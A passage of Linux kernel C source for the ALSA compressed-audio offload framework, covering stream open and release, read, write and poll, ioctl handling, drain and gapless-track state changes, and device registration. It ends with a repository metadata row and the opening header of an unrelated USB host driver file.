* SNDRV_PCM_STATE_RUNNING: When stream has been started and is
* decoding/encoding and rendering/capturing data.
* SNDRV_PCM_STATE_DRAINING: When stream is draining current data. This is done
* by calling SNDRV_COMPRESS_DRAIN.
* SNDRV_PCM_STATE_PAUSED: When stream is paused. This is done by calling
* SNDRV_COMPRESS_PAUSE. It can be stopped or resumed by calling
* SNDRV_COMPRESS_STOP or SNDRV_COMPRESS_RESUME respectively.
*/
/*
 * Device open: map the access mode onto a stream direction, look up the
 * device behind the minor, allocate per-file and runtime state and call
 * the driver's open(). The card reference taken by the minor lookup is
 * always dropped before returning.
 */
static int snd_compr_open(struct inode *inode, struct file *f)
{
struct snd_compr *compr;
struct snd_compr_file *data;
struct snd_compr_runtime *runtime;
enum snd_compr_direction dirn;
int maj = imajor(inode);
int ret;
/* O_WRONLY => playback, O_RDONLY => capture; O_RDWR is rejected */
if ((f->f_flags & O_ACCMODE) == O_WRONLY)
dirn = SND_COMPRESS_PLAYBACK;
else if ((f->f_flags & O_ACCMODE) == O_RDONLY)
dirn = SND_COMPRESS_CAPTURE;
else
return -EINVAL;
if (maj == snd_major)
compr = snd_lookup_minor_data(iminor(inode),
SNDRV_DEVICE_TYPE_COMPRESS);
else
return -EBADFD;
if (compr == NULL) {
pr_err("no device data!!!\n");
return -ENODEV;
}
if (dirn != compr->direction) {
pr_err("this device doesn't support this direction\n");
snd_card_unref(compr->card);
return -EINVAL;
}
data = kzalloc(sizeof(*data), GFP_KERNEL);
if (!data) {
snd_card_unref(compr->card);
return -ENOMEM;
}
data->stream.ops = compr->ops;
data->stream.direction = dirn;
data->stream.private_data = compr->private_data;
data->stream.device = compr;
runtime = kzalloc(sizeof(*runtime), GFP_KERNEL);
if (!runtime) {
kfree(data);
snd_card_unref(compr->card);
return -ENOMEM;
}
runtime->state = SNDRV_PCM_STATE_OPEN;
init_waitqueue_head(&runtime->sleep);
data->stream.runtime = runtime;
f->private_data = (void *)data;
/* driver open under the device lock; undo allocations on failure */
mutex_lock(&compr->lock);
ret = compr->ops->open(&data->stream);
mutex_unlock(&compr->lock);
if (ret) {
kfree(runtime);
kfree(data);
}
snd_card_unref(compr->card);
return ret;
}
/*
 * Release: stop the stream if it is still active, let the driver free
 * its state, then release the ring buffer, runtime and file data.
 */
static int snd_compr_free(struct inode *inode, struct file *f)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_runtime *runtime = data->stream.runtime;
switch (runtime->state) {
case SNDRV_PCM_STATE_RUNNING:
case SNDRV_PCM_STATE_DRAINING:
case SNDRV_PCM_STATE_PAUSED:
data->stream.ops->trigger(&data->stream,
SNDRV_PCM_TRIGGER_STOP);
break;
default:
break;
}
data->stream.ops->free(&data->stream);
kfree(data->stream.runtime->buffer);
kfree(data->stream.runtime);
kfree(data);
return 0;
}
/*
 * Query the DSP position via the driver's pointer() op and fold the
 * copied_total counter into the runtime byte accounting: bytes
 * transferred for playback, bytes available for capture.
 */
static int snd_compr_update_tstamp(struct snd_compr_stream *stream,
struct snd_compr_tstamp *tstamp)
{
int err = 0;
if (!stream->ops->pointer)
return -ENOTSUPP;
err = stream->ops->pointer(stream, tstamp);
if (err)
return err;
pr_debug("dsp consumed till %d total %llu bytes\n",
tstamp->byte_offset, tstamp->copied_total);
if (stream->direction == SND_COMPRESS_PLAYBACK)
stream->runtime->total_bytes_transferred = tstamp->copied_total;
else
stream->runtime->total_bytes_available = tstamp->copied_total;
return 0;
}
/*
 * Compute how many bytes userspace may transfer right now: free ring
 * buffer space for playback, pending bytes for capture. Also refreshes
 * the timestamp inside *avail (best effort).
 */
static size_t snd_compr_calc_avail(struct snd_compr_stream *stream,
struct snd_compr_avail *avail)
{
memset(avail, 0, sizeof(*avail));
snd_compr_update_tstamp(stream, &avail->tstamp);
/* Still need to return avail even if tstamp can't be filled in */
/* fresh playback stream with no write yet: whole buffer is free */
if (stream->runtime->total_bytes_available == 0 &&
stream->runtime->state == SNDRV_PCM_STATE_SETUP &&
stream->direction == SND_COMPRESS_PLAYBACK) {
pr_debug("detected init and someone forgot to do a write\n");
return stream->runtime->buffer_size;
}
pr_debug("app wrote %lld, DSP consumed %lld\n",
stream->runtime->total_bytes_available,
stream->runtime->total_bytes_transferred);
if (stream->runtime->total_bytes_available ==
stream->runtime->total_bytes_transferred) {
if (stream->direction == SND_COMPRESS_PLAYBACK) {
pr_debug("both pointers are same, returning full avail\n");
return stream->runtime->buffer_size;
} else {
pr_debug("both pointers are same, returning no avail\n");
return 0;
}
}
/* bytes queued but not yet consumed by the DSP ... */
avail->avail = stream->runtime->total_bytes_available -
stream->runtime->total_bytes_transferred;
/* ... which for playback is the complement of free space */
if (stream->direction == SND_COMPRESS_PLAYBACK)
avail->avail = stream->runtime->buffer_size - avail->avail;
pr_debug("ret avail as %lld\n", avail->avail);
return avail->avail;
}
static inline size_t snd_compr_get_avail(struct snd_compr_stream *stream)
{
struct snd_compr_avail avail;
return snd_compr_calc_avail(stream, &avail);
}
/* SNDRV_COMPRESS_AVAIL: fill a snd_compr_avail (timestamp + available
 * byte count) and copy it to userspace. */
static int
snd_compr_ioctl_avail(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_compr_avail ioctl_avail;

	ioctl_avail.avail = snd_compr_calc_avail(stream, &ioctl_avail);
	if (copy_to_user((__u64 __user *)arg,
			 &ioctl_avail, sizeof(ioctl_avail)))
		return -EFAULT;
	return 0;
}
/*
 * Copy 'count' bytes from userspace into the runtime ring buffer,
 * splitting the copy in two when it wraps, then notify the driver via
 * ack() if implemented. Returns bytes written or -EFAULT.
 */
static int snd_compr_write_data(struct snd_compr_stream *stream,
const char __user *buf, size_t count)
{
void *dstn;
size_t copy;
struct snd_compr_runtime *runtime = stream->runtime;
/* 64-bit Modulus */
/* app_pointer = total_bytes_available % buffer_size */
u64 app_pointer = div64_u64(runtime->total_bytes_available,
runtime->buffer_size);
app_pointer = runtime->total_bytes_available -
(app_pointer * runtime->buffer_size);
dstn = runtime->buffer + app_pointer;
pr_debug("copying %zu at %lld\n",
count, app_pointer);
if (count < runtime->buffer_size - app_pointer) {
if (copy_from_user(dstn, buf, count))
return -EFAULT;
} else {
/* wrap-around: tail of the buffer, then the head */
copy = runtime->buffer_size - app_pointer;
if (copy_from_user(dstn, buf, copy))
return -EFAULT;
if (copy_from_user(runtime->buffer, buf + copy, count - copy))
return -EFAULT;
}
/* if DSP cares, let it know data has been written */
if (stream->ops->ack)
stream->ops->ack(stream, count);
return count;
}
/*
 * write(2) entry point: clamp the request to the free ring-buffer
 * space, copy via the driver's copy() op or the shared ring buffer, and
 * advance the accounting. The first write moves SETUP -> PREPARED.
 */
static ssize_t snd_compr_write(struct file *f, const char __user *buf,
size_t count, loff_t *offset)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_stream *stream;
size_t avail;
int retval;
if (snd_BUG_ON(!data))
return -EFAULT;
stream = &data->stream;
mutex_lock(&stream->device->lock);
/* write is allowed when stream is running or has been set up */
if (stream->runtime->state != SNDRV_PCM_STATE_SETUP &&
stream->runtime->state != SNDRV_PCM_STATE_PREPARED &&
stream->runtime->state != SNDRV_PCM_STATE_RUNNING) {
mutex_unlock(&stream->device->lock);
return -EBADFD;
}
avail = snd_compr_get_avail(stream);
pr_debug("avail returned %zu\n", avail);
/* calculate how much we can write to buffer */
if (avail > count)
avail = count;
if (stream->ops->copy) {
char __user* cbuf = (char __user*)buf;
retval = stream->ops->copy(stream, cbuf, avail);
} else {
retval = snd_compr_write_data(stream, buf, avail);
}
if (retval > 0)
stream->runtime->total_bytes_available += retval;
/* while initiating the stream, write should be called before START
 * call, so in setup move state */
if (stream->runtime->state == SNDRV_PCM_STATE_SETUP) {
stream->runtime->state = SNDRV_PCM_STATE_PREPARED;
pr_debug("stream prepared, Houston we are good to go\n");
}
mutex_unlock(&stream->device->lock);
return retval;
}
/*
 * read(2) entry point for capture streams: clamp to the pending byte
 * count and hand off to the driver's copy() op (mandatory for reads).
 */
static ssize_t snd_compr_read(struct file *f, char __user *buf,
size_t count, loff_t *offset)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_stream *stream;
size_t avail;
int retval;
if (snd_BUG_ON(!data))
return -EFAULT;
stream = &data->stream;
mutex_lock(&stream->device->lock);
/* read is allowed when stream is running, paused, draining and setup
 * (yes setup is state which we transition to after stop, so if user
 * wants to read data after stop we allow that)
 */
switch (stream->runtime->state) {
case SNDRV_PCM_STATE_OPEN:
case SNDRV_PCM_STATE_PREPARED:
case SNDRV_PCM_STATE_XRUN:
case SNDRV_PCM_STATE_SUSPENDED:
case SNDRV_PCM_STATE_DISCONNECTED:
retval = -EBADFD;
goto out;
}
avail = snd_compr_get_avail(stream);
pr_debug("avail returned %zu\n", avail);
/* calculate how much we can read from buffer */
if (avail > count)
avail = count;
if (stream->ops->copy) {
retval = stream->ops->copy(stream, buf, avail);
} else {
/* no core-side capture buffering: copy() is required */
retval = -ENXIO;
goto out;
}
if (retval > 0)
stream->runtime->total_bytes_transferred += retval;
out:
mutex_unlock(&stream->device->lock);
return retval;
}
/* mmap of a compressed stream is not supported. */
static int snd_compr_mmap(struct file *f, struct vm_area_struct *vma)
{
return -ENXIO;
}
/* Direction-appropriate "ready" poll mask: writable for playback,
 * readable for capture. */
static inline int snd_compr_get_poll(struct snd_compr_stream *stream)
{
	return (stream->direction == SND_COMPRESS_PLAYBACK) ?
		(POLLOUT | POLLWRNORM) : (POLLIN | POLLRDNORM);
}
/*
 * poll(2) entry point: register on the runtime waitqueue and report
 * readiness when at least one fragment can be transferred. Waking out
 * of DRAINING also completes the drain (state -> SETUP).
 */
static unsigned int snd_compr_poll(struct file *f, poll_table *wait)
{
struct snd_compr_file *data = f->private_data;
struct snd_compr_stream *stream;
size_t avail;
int retval = 0;
if (snd_BUG_ON(!data))
return -EFAULT;
stream = &data->stream;
if (snd_BUG_ON(!stream))
return -EFAULT;
mutex_lock(&stream->device->lock);
if (stream->runtime->state == SNDRV_PCM_STATE_PAUSED ||
stream->runtime->state == SNDRV_PCM_STATE_OPEN) {
retval = -EBADFD;
goto out;
}
poll_wait(f, &stream->runtime->sleep, wait);
avail = snd_compr_get_avail(stream);
pr_debug("avail is %zu\n", avail);
/* check if we have at least one fragment to fill */
switch (stream->runtime->state) {
case SNDRV_PCM_STATE_DRAINING:
/* stream has been woken up after drain is complete
 * draining done so set stream state to stopped
 */
retval = snd_compr_get_poll(stream);
stream->runtime->state = SNDRV_PCM_STATE_SETUP;
break;
case SNDRV_PCM_STATE_RUNNING:
case SNDRV_PCM_STATE_PREPARED:
case SNDRV_PCM_STATE_PAUSED:
if (avail >= stream->runtime->fragment_size)
retval = snd_compr_get_poll(stream);
break;
default:
/* unexpected state: flag an error condition to the caller */
if (stream->direction == SND_COMPRESS_PLAYBACK)
retval = POLLOUT | POLLWRNORM | POLLERR;
else
retval = POLLIN | POLLRDNORM | POLLERR;
break;
}
out:
mutex_unlock(&stream->device->lock);
return retval;
}
/* SNDRV_COMPRESS_GET_CAPS: fetch device capabilities from the driver
 * and copy them to userspace. */
static int
snd_compr_get_caps(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_compr_caps caps;
	int retval;

	if (!stream->ops->get_caps)
		return -ENXIO;
	memset(&caps, 0, sizeof(caps));
	retval = stream->ops->get_caps(stream, &caps);
	if (retval)
		return retval;
	if (copy_to_user((void __user *)arg, &caps, sizeof(caps)))
		return -EFAULT;
	return 0;
}
/* SNDRV_COMPRESS_GET_CODEC_CAPS: codec caps are large, so they are
 * heap-allocated rather than placed on the stack. */
static int
snd_compr_get_codec_caps(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_compr_codec_caps *caps;
	int retval;

	if (!stream->ops->get_codec_caps)
		return -ENXIO;
	caps = kzalloc(sizeof(*caps), GFP_KERNEL);
	if (!caps)
		return -ENOMEM;
	retval = stream->ops->get_codec_caps(stream, caps);
	if (!retval &&
	    copy_to_user((void __user *)arg, caps, sizeof(*caps)))
		retval = -EFAULT;
	kfree(caps);
	return retval;
}
/* revisit this with snd_pcm_preallocate_xxx */
static int snd_compr_allocate_buffer(struct snd_compr_stream *stream,
struct snd_compr_params *params)
{
unsigned int buffer_size;
void *buffer;
buffer_size = params->buffer.fragment_size * params->buffer.fragments;
if (stream->ops->copy) {
buffer = NULL;
/* if copy is defined the driver will be required to copy
* the data from core
*/
} else {
buffer = kmalloc(buffer_size, GFP_KERNEL);
if (!buffer)
return -ENOMEM;
}
stream->runtime->fragment_size = params->buffer.fragment_size;
stream->runtime->fragments = params->buffer.fragments;
stream->runtime->buffer = buffer;
stream->runtime->buffer_size = buffer_size;
return 0;
}
/*
 * Sanity-check userspace parameters: non-zero fragment size, a
 * fragment count that cannot overflow the total size, a known codec id
 * and non-zero channel counts.
 */
static int snd_compress_check_input(struct snd_compr_params *params)
{
/* first let's check the buffer parameter's */
if (params->buffer.fragment_size == 0 ||
params->buffer.fragments > INT_MAX / params->buffer.fragment_size)
return -EINVAL;
/* now codec parameters */
if (params->codec.id == 0 || params->codec.id > SND_AUDIOCODEC_MAX)
return -EINVAL;
if (params->codec.ch_in == 0 || params->codec.ch_out == 0)
return -EINVAL;
return 0;
}
/*
 * SNDRV_COMPRESS_SET_PARAMS: validate and apply stream parameters.
 * Only legal directly after open (OPEN state); on success playback
 * moves to SETUP (a write is still needed before START) and capture
 * straight to PREPARED.
 * Fix: the original clobbered snd_compr_allocate_buffer()'s return
 * value with a blanket -ENOMEM; propagate the real error instead. The
 * state check is also turned into a guard clause.
 */
static int
snd_compr_set_params(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_compr_params *params;
	int retval;

	/* parameter changes are only allowed on a freshly opened stream */
	if (stream->runtime->state != SNDRV_PCM_STATE_OPEN)
		return -EPERM;

	params = kmalloc(sizeof(*params), GFP_KERNEL);
	if (!params)
		return -ENOMEM;
	if (copy_from_user(params, (void __user *)arg, sizeof(*params))) {
		retval = -EFAULT;
		goto out;
	}
	retval = snd_compress_check_input(params);
	if (retval)
		goto out;
	retval = snd_compr_allocate_buffer(stream, params);
	if (retval)
		goto out;
	retval = stream->ops->set_params(stream, params);
	if (retval)
		goto out;
	stream->metadata_set = false;
	stream->next_track = false;
	if (stream->direction == SND_COMPRESS_PLAYBACK)
		stream->runtime->state = SNDRV_PCM_STATE_SETUP;
	else
		stream->runtime->state = SNDRV_PCM_STATE_PREPARED;
out:
	kfree(params);
	return retval;
}
/* SNDRV_COMPRESS_GET_PARAMS: read the codec parameters back from the
 * driver and copy them to userspace. */
static int
snd_compr_get_params(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_codec *params;
	int retval;

	if (!stream->ops->get_params)
		return -EBADFD;
	params = kzalloc(sizeof(*params), GFP_KERNEL);
	if (!params)
		return -ENOMEM;
	retval = stream->ops->get_params(stream, params);
	if (!retval &&
	    copy_to_user((char __user *)arg, params, sizeof(*params)))
		retval = -EFAULT;
	kfree(params);
	return retval;
}
/* SNDRV_COMPRESS_GET_METADATA: the key comes in from userspace, the
 * driver fills the value, and the struct is copied back out. */
static int
snd_compr_get_metadata(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_compr_metadata metadata;
	int retval;

	if (!stream->ops->get_metadata)
		return -ENXIO;
	if (copy_from_user(&metadata, (void __user *)arg, sizeof(metadata)))
		return -EFAULT;
	retval = stream->ops->get_metadata(stream, &metadata);
	if (retval)
		return retval;
	if (copy_to_user((void __user *)arg, &metadata, sizeof(metadata)))
		return -EFAULT;
	return 0;
}
/* SNDRV_COMPRESS_SET_METADATA: forward a metadata key/value pair to
 * the driver and remember that metadata has been set (required before
 * signalling a gapless next track). */
static int
snd_compr_set_metadata(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_compr_metadata metadata;
	int retval;

	if (!stream->ops->set_metadata)
		return -ENXIO;
	/*
	 * we should allow parameter change only when stream has been
	 * opened not in other cases
	 */
	if (copy_from_user(&metadata, (void __user *)arg, sizeof(metadata)))
		return -EFAULT;
	retval = stream->ops->set_metadata(stream, &metadata);
	stream->metadata_set = true;
	return retval;
}
/* SNDRV_COMPRESS_TSTAMP: query the DSP position and report it to
 * userspace. */
static inline int
snd_compr_tstamp(struct snd_compr_stream *stream, unsigned long arg)
{
	struct snd_compr_tstamp tstamp;
	int ret;

	memset(&tstamp, 0, sizeof(tstamp));
	ret = snd_compr_update_tstamp(stream, &tstamp);
	if (ret)
		return ret;
	if (copy_to_user((struct snd_compr_tstamp __user *)arg,
			 &tstamp, sizeof(tstamp)))
		return -EFAULT;
	return 0;
}
/* PAUSE is only legal from RUNNING; update state on success. */
static int snd_compr_pause(struct snd_compr_stream *stream)
{
	int retval;

	if (stream->runtime->state != SNDRV_PCM_STATE_RUNNING)
		return -EPERM;
	retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_PAUSE_PUSH);
	if (retval == 0)
		stream->runtime->state = SNDRV_PCM_STATE_PAUSED;
	return retval;
}
/* RESUME is only legal from PAUSED; back to RUNNING on success. */
static int snd_compr_resume(struct snd_compr_stream *stream)
{
	int retval;

	if (stream->runtime->state != SNDRV_PCM_STATE_PAUSED)
		return -EPERM;
	retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_PAUSE_RELEASE);
	if (retval == 0)
		stream->runtime->state = SNDRV_PCM_STATE_RUNNING;
	return retval;
}
/* START requires PREPARED (i.e. params set and, for playback, data
 * written); move to RUNNING on success. */
static int snd_compr_start(struct snd_compr_stream *stream)
{
	int retval;

	if (stream->runtime->state != SNDRV_PCM_STATE_PREPARED)
		return -EPERM;
	retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_START);
	if (retval == 0)
		stream->runtime->state = SNDRV_PCM_STATE_RUNNING;
	return retval;
}
/*
 * STOP an active stream: back to SETUP, wake any pollers and reset the
 * byte accounting. Not allowed if the stream never started.
 */
static int snd_compr_stop(struct snd_compr_stream *stream)
{
int retval;
if (stream->runtime->state == SNDRV_PCM_STATE_PREPARED ||
stream->runtime->state == SNDRV_PCM_STATE_SETUP)
return -EPERM;
retval = stream->ops->trigger(stream, SNDRV_PCM_TRIGGER_STOP);
if (!retval) {
stream->runtime->state = SNDRV_PCM_STATE_SETUP;
wake_up(&stream->runtime->sleep);
stream->runtime->total_bytes_available = 0;
stream->runtime->total_bytes_transferred = 0;
}
return retval;
}
/* this fn is called without lock being held and we change stream states here
* so while using the stream state auquire the lock but relase before invoking
* DSP as the call will possibly take a while
*/
static int snd_compr_drain(struct snd_compr_stream *stream)
{
	int retval;

	/* validate the state under the device lock... */
	mutex_lock(&stream->device->lock);
	if (stream->runtime->state == SNDRV_PCM_STATE_PREPARED ||
			stream->runtime->state == SNDRV_PCM_STATE_SETUP) {
		retval = -EPERM;
		goto ret;
	}
	/* ...but drop it across the trigger: the DSP call may block a while */
	mutex_unlock(&stream->device->lock);
	retval = stream->ops->trigger(stream, SND_COMPR_TRIGGER_DRAIN);
	mutex_lock(&stream->device->lock);
	if (!retval) {
		stream->runtime->state = SNDRV_PCM_STATE_DRAINING;
		wake_up(&stream->runtime->sleep);
	}
ret:
	mutex_unlock(&stream->device->lock);
	return retval;
}
/*
 * Switch a gapless stream over to the next track.  On success the current
 * metadata is consumed (metadata_set cleared) and next_track is flagged so
 * a subsequent partial drain is permitted.
 */
static int snd_compr_next_track(struct snd_compr_stream *stream)
{
	int retval;

	/* only a running stream can transition to next track */
	if (stream->runtime->state != SNDRV_PCM_STATE_RUNNING)
		return -EPERM;

	/* you can signal next track if this is intended to be a gapless stream
	 * and current track metadata is set
	 */
	if (stream->metadata_set == false)
		return -EPERM;

	retval = stream->ops->trigger(stream, SND_COMPR_TRIGGER_NEXT_TRACK);
	if (retval != 0)
		return retval;
	stream->metadata_set = false;
	stream->next_track = true;
	return 0;
}
/*
 * Drain the remainder of the current track after a NEXT_TRACK transition.
 * The state is validated under the device lock; the trigger itself runs
 * unlocked because the DSP call may block for a while.
 */
static int snd_compr_partial_drain(struct snd_compr_stream *stream)
{
	int retval;

	mutex_lock(&stream->device->lock);
	if (stream->runtime->state == SNDRV_PCM_STATE_PREPARED ||
			stream->runtime->state == SNDRV_PCM_STATE_SETUP) {
		mutex_unlock(&stream->device->lock);
		return -EPERM;
	}
	mutex_unlock(&stream->device->lock);
	/* stream can be drained only when next track has been signalled */
	/* NOTE(review): next_track is read/cleared after the lock is dropped;
	 * presumably serialized by the caller - confirm against ioctl paths. */
	if (stream->next_track == false)
		return -EPERM;

	retval = stream->ops->trigger(stream, SND_COMPR_TRIGGER_PARTIAL_DRAIN);

	stream->next_track = false;
	return retval;
}
/*
 * Hand codec options for the upcoming (gapless) track down to the driver.
 *
 * @stream: compressed stream being operated on
 * @arg:    user pointer to a union snd_codec_options
 *
 * Returns 0 on success, -EPERM when the stream state does not allow it or
 * the driver does not implement the callback, -EFAULT on a bad user copy,
 * or the driver's error code.
 */
static int snd_compr_set_next_track_param(struct snd_compr_stream *stream,
		unsigned long arg)
{
	union snd_codec_options codec_options;

	/* set next track params when stream is running or has been setup */
	if (stream->runtime->state != SNDRV_PCM_STATE_SETUP &&
			stream->runtime->state != SNDRV_PCM_STATE_RUNNING)
		return -EPERM;

	/* the op is optional: snd_compress_register() only mandates
	 * open/free/set_params/trigger, so guard against a NULL deref */
	if (!stream->ops->set_next_track_param)
		return -EPERM;

	if (copy_from_user(&codec_options, (void __user *)arg,
			sizeof(codec_options)))
		return -EFAULT;

	return stream->ops->set_next_track_param(stream, &codec_options);
}
/*
 * Dispatch the ioctls that must not run under the device lock.  Called
 * from snd_compr_ioctl() after it has released stream->device->lock.
 * Returns -ENOTTY for commands not recognised here.
 */
static int snd_compress_simple_ioctls(struct file *file,
				struct snd_compr_stream *stream,
				unsigned int cmd, unsigned long arg)
{
	int retval = -ENOTTY;

	switch (_IOC_NR(cmd)) {
	case _IOC_NR(SNDRV_COMPRESS_IOCTL_VERSION):
		/* report the compress API version this core was built with */
		retval = put_user(SNDRV_COMPRESS_VERSION,
				(int __user *)arg) ? -EFAULT : 0;
		break;
	case _IOC_NR(SNDRV_COMPRESS_GET_CAPS):
		retval = snd_compr_get_caps(stream, arg);
		break;
	case _IOC_NR(SNDRV_COMPRESS_GET_CODEC_CAPS):
		retval = snd_compr_get_codec_caps(stream, arg);
		break;
	case _IOC_NR(SNDRV_COMPRESS_TSTAMP):
		retval = snd_compr_tstamp(stream, arg);
		break;
	case _IOC_NR(SNDRV_COMPRESS_AVAIL):
		retval = snd_compr_ioctl_avail(stream, arg);
		break;
	/* drain and partial drain need special handling
	 * we need to drop the locks here as the streams would get blocked on
	 * the dsp to get drained. The locking would be handled in respective
	 * function here
	 */
	case _IOC_NR(SNDRV_COMPRESS_DRAIN):
		retval = snd_compr_drain(stream);
		break;
	case _IOC_NR(SNDRV_COMPRESS_PARTIAL_DRAIN):
		retval = snd_compr_partial_drain(stream);
		break;
	}

	return retval;
}
/*
 * Main ioctl entry point for a compressed stream.  State-changing commands
 * run with the device lock held; everything else is forwarded to
 * snd_compress_simple_ioctls() with the lock released.
 */
static long snd_compr_ioctl(struct file *f, unsigned int cmd, unsigned long arg)
{
	struct snd_compr_file *data = f->private_data;
	struct snd_compr_stream *stream;
	int retval = -ENOTTY;

	if (snd_BUG_ON(!data))
		return -EFAULT;
	stream = &data->stream;
	if (snd_BUG_ON(!stream))
		return -EFAULT;

	mutex_lock(&stream->device->lock);
	switch (_IOC_NR(cmd)) {
	case _IOC_NR(SNDRV_COMPRESS_SET_PARAMS):
		retval = snd_compr_set_params(stream, arg);
		break;
	case _IOC_NR(SNDRV_COMPRESS_GET_PARAMS):
		retval = snd_compr_get_params(stream, arg);
		break;
	case _IOC_NR(SNDRV_COMPRESS_SET_METADATA):
		retval = snd_compr_set_metadata(stream, arg);
		break;
	case _IOC_NR(SNDRV_COMPRESS_GET_METADATA):
		retval = snd_compr_get_metadata(stream, arg);
		break;
	case _IOC_NR(SNDRV_COMPRESS_PAUSE):
		retval = snd_compr_pause(stream);
		break;
	case _IOC_NR(SNDRV_COMPRESS_RESUME):
		retval = snd_compr_resume(stream);
		break;
	case _IOC_NR(SNDRV_COMPRESS_START):
		retval = snd_compr_start(stream);
		break;
	case _IOC_NR(SNDRV_COMPRESS_STOP):
		retval = snd_compr_stop(stream);
		break;
	case _IOC_NR(SNDRV_COMPRESS_NEXT_TRACK):
		retval = snd_compr_next_track(stream);
		break;
	case _IOC_NR(SNDRV_COMPRESS_SET_NEXT_TRACK_PARAM):
		retval = snd_compr_set_next_track_param(stream, arg);
		break;
	default:
		/* drop the lock: drain/partial-drain do their own locking */
		mutex_unlock(&stream->device->lock);
		return snd_compress_simple_ioctls(f, stream, cmd, arg);
	}
	mutex_unlock(&stream->device->lock);
	return retval;
}
/* Character-device entry points for the compress device node. */
static const struct file_operations snd_compr_file_ops = {
		.owner =	THIS_MODULE,
		.open =		snd_compr_open,
		.release =	snd_compr_free,
		.write =	snd_compr_write,
		.read =		snd_compr_read,
		.unlocked_ioctl = snd_compr_ioctl,
		.compat_ioctl = snd_compr_ioctl,
		.mmap =		snd_compr_mmap,
		.poll =		snd_compr_poll,
};
/*
 * snd_device .dev_register callback: expose the compress stream as
 * "comprC<card>D<device>" via the ALSA device core.
 *
 * Returns 0 on success or the negative error from snd_register_device().
 */
static int snd_compress_dev_register(struct snd_device *device)
{
	int ret;
	char str[16];
	struct snd_compr *compr;

	if (snd_BUG_ON(!device || !device->device_data))
		return -EBADFD;
	compr = device->device_data;

	/* bounded format: card/device numbers cannot overflow str silently */
	snprintf(str, sizeof(str), "comprC%iD%i", compr->card->number,
		 compr->device);
	pr_debug("reg %s for device %s, direction %d\n", str, compr->name,
			compr->direction);
	/* register compressed device */
	ret = snd_register_device(SNDRV_DEVICE_TYPE_COMPRESS, compr->card,
			compr->device, &snd_compr_file_ops, compr, str);
	if (ret < 0)
		/* fixed format: the error code belongs before the newline */
		pr_err("snd_register_device failed: %d\n", ret);
	return ret;
}
/* snd_device .dev_disconnect callback: remove the compress device node. */
static int snd_compress_dev_disconnect(struct snd_device *device)
{
	struct snd_compr *compr = device->device_data;

	snd_unregister_device(SNDRV_DEVICE_TYPE_COMPRESS, compr->card,
			      compr->device);
	return 0;
}
/**
 * snd_compress_new: create new compress device
 * @card: sound card pointer
 * @device: device number
 * @dirn: device direction, should be of type enum snd_compr_direction
 * @compr: compress device pointer
 *
 * Returns the result of snd_device_new() (0 on success).
 */
int snd_compress_new(struct snd_card *card, int device,
			int dirn, struct snd_compr *compr)
{
	/* only register/disconnect are needed; freeing is the caller's job */
	static struct snd_device_ops ops = {
		.dev_free = NULL,
		.dev_register = snd_compress_dev_register,
		.dev_disconnect = snd_compress_dev_disconnect,
	};

	compr->card = card;
	compr->device = device;
	compr->direction = dirn;
	return snd_device_new(card, SNDRV_DEV_COMPRESS, compr, &ops);
}
EXPORT_SYMBOL_GPL(snd_compress_new);
/**
 * snd_compress_free: free compress device
 * @card: sound card pointer
 * @compr: compress device pointer
 */
void snd_compress_free(struct snd_card *card, struct snd_compr *compr)
{
	snd_device_free(card, compr);
}
EXPORT_SYMBOL_GPL(snd_compress_free);
/* Register the card backing @device with the ALSA core. */
static int snd_compress_add_device(struct snd_compr *device)
{
	int ret;

	if (!device->card)
		return -EINVAL;

	/* register the card */
	ret = snd_card_register(device->card);
	if (ret) {
		pr_err("failed with %d\n", ret);
		return ret;
	}
	return 0;
}
/* Counterpart of snd_compress_add_device(): release the backing card. */
static int snd_compress_remove_device(struct snd_compr *device)
{
	return snd_card_free(device->card);
}
/**
 * snd_compress_register - register compressed device
 *
 * @device: compressed device to register
 *
 * Return: 0 on success, -EINVAL when a mandatory field or callback is
 * missing, or the error from card registration.
 */
int snd_compress_register(struct snd_compr *device)
{
	int retval;

	if (device->name == NULL || device->dev == NULL || device->ops == NULL)
		return -EINVAL;

	pr_debug("Registering compressed device %s\n", device->name);
	/* these four callbacks are mandatory; all others are optional */
	if (snd_BUG_ON(!device->ops->open))
		return -EINVAL;
	if (snd_BUG_ON(!device->ops->free))
		return -EINVAL;
	if (snd_BUG_ON(!device->ops->set_params))
		return -EINVAL;
	if (snd_BUG_ON(!device->ops->trigger))
		return -EINVAL;

	mutex_init(&device->lock);

	/* register a compressed card */
	mutex_lock(&device_mutex);
	retval = snd_compress_add_device(device);
	mutex_unlock(&device_mutex);
	return retval;
}
EXPORT_SYMBOL_GPL(snd_compress_register);
/**
 * snd_compress_deregister - remove a previously registered compressed device
 * @device: compressed device to remove
 *
 * Return: always 0.
 */
int snd_compress_deregister(struct snd_compr *device)
{
	pr_debug("Removing compressed device %s\n", device->name);
	mutex_lock(&device_mutex);
	snd_compress_remove_device(device);
	mutex_unlock(&device_mutex);
	return 0;
}
EXPORT_SYMBOL_GPL(snd_compress_deregister);
/* Nothing to set up at module load; devices register themselves later. */
static int __init snd_compress_init(void)
{
	return 0;
}
/* Nothing to tear down at module unload. */
static void __exit snd_compress_exit(void)
{
}
module_init(snd_compress_init);
module_exit(snd_compress_exit);
MODULE_DESCRIPTION("ALSA Compressed offload framework");
MODULE_AUTHOR("Vinod Koul <vinod.koul@linux.intel.com>");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
ska-sa/borph_linux_devel | drivers/usb/host/ohci-omap.c | 3 | 13576 | /*
* OHCI HCD (Host Controller Driver) for USB.
*
* (C) Copyright 1999 Roman Weissgaerber <weissg@vienna.at>
* (C) Copyright 2000-2005 David Brownell
* (C) Copyright 2002 Hewlett-Packard Company
*
* OMAP Bus Glue
*
* Modified for OMAP by Tony Lindgren <tony@atomide.com>
* Based on the 2.4 OMAP OHCI driver originally done by MontaVista Software Inc.
* and on ohci-sa1111.c by Christopher Hoover <ch@hpl.hp.com>
*
